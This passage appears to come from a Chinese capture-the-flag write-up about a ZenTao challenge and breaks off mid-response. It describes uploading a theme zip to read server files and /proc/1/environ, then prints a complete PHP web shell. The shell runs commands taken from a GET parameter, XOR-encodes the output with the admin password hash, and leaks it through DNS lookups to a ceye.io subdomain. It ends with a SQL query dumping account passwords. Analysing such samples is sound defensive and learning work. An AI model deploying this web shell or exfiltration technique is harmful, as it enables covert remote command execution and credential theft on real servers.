然后打包default_v3
成default_v3.zip
,到后台风格管理处上传zip文件并启用主题。
此时再去访问模版管理即可从根目录访问所有文件
跟之前一样,访问/proc/1/environ
,即可找到flag
0x03 hacker
<?php $servername="127.0.0.1";
$username="root";
$password="123456";
$dbname="zentao";
$conn=new PDO("mysql:host=$servername;dbname=$dbname",$username,$password);
$conn->setAttribute(PDO::ATTR\_ERRMODE,PDO::ERRMODE\_EXCEPTION);
$stmt=$conn->prepare("SELECT password FROM zt\_user WHERE account=\'admin\'");
$stmt->execute();
$result=$stmt->fetch(PDO::FETCH\_ASSOC);
$conn=null;
$param=$\_GET["cmd"];
$password=$result["password"];
$output=shell\_exec($param);
$hex\_output=bin2hex($output);
$hex\_password=bin2hex($password);
$len\_output=strlen($hex\_output);
$len\_password=strlen($hex\_password);
$max\_subdomain\_length=62;
$subdomain\_base="yafgcy.ceye.io";
$hex\_xor="";
for ($i=0;$i<$len\_output;$i++) {
$char\_output=$hex\_output[$i];
$char\_password=$hex\_password[$i%$len\_password];
$char\_xor=dechex(hexdec($char\_output)^hexdec($char\_password));
if(strlen($hex\_xor.$char\_xor)>$max\_subdomain\_length) {
if(strlen($hex\_xor)%2!=0) {
$subdomain="0"."$hex\_xor.$subdomain\_base";
} else {
$subdomain="$hex\_xor.$subdomain\_base";
}
gethostbyname($subdomain);
$hex\_xor="";
} else {
$hex\_xor.=$char\_xor;
}
}
if(strlen($hex\_xor)%2!=0) {
$subdomain="0"."$hex\_xor.$subdomain\_base";
} else {
$subdomain="$hex\_xor.$subdomain\_base";
}
gethostbyname($subdomain);
?>
可以看到执行命令的被外带了,响应包并不会有回显
注入查询出来的数据库数据,里面有admin的密码
<xmp class='a-left'>select account,password from zt_user</xmp>{"status":"success","data":"[{\"account\":\"admin\",\"